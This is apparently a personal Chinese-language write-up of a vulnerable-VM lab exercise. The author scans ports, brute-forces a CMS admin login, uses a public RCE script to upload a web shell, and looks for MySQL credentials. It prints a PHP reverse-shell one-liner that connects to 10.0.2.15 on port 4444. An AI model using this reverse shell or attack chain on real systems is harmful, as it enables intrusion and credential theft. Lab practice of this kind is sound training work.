不懂为啥有些操作不能复现，只好抄抄wp，跳过了

0x01

打开虚拟机可以看到ip

然后扫一下端口

0x02

开了80，去看看。
发现是有漏洞的cms，可以直接去github的issue看
关键就是登录后台了。一开始是用爆破工具。（理论上能出，因为密码在那个字典里，不过字典有1000+w，就不等了，看wp）
说是ssh可以有提示

wtf，说好的提示呢。
不管了，算是爆破出密码了。直接登录admin
然后网上能找到这个cms的rce脚本
然后干

然后打开那个shell.phar链接就直接rce

然后就不懂在哪里进行信息收集了。看看wp

/etc/passwd里面有mysql，去/var里面找找有没有mysql的数据

本来想干脆点直接看passwd的，结果没权限。而且这个bak cat没有回显，原来是要下载

内容

找到数据库用户和密码。该死的那个rce没有mysql的回显，所以要反弹shell
在p0wny那里运行php -r '$sock=fsockopen("10.0.2.15",4444);exec("bash <&3 >&3 2>&3");'
但是不懂为啥，本地明明ping的通，却无法反弹shell。
不管了，就算是拿到用户名密码了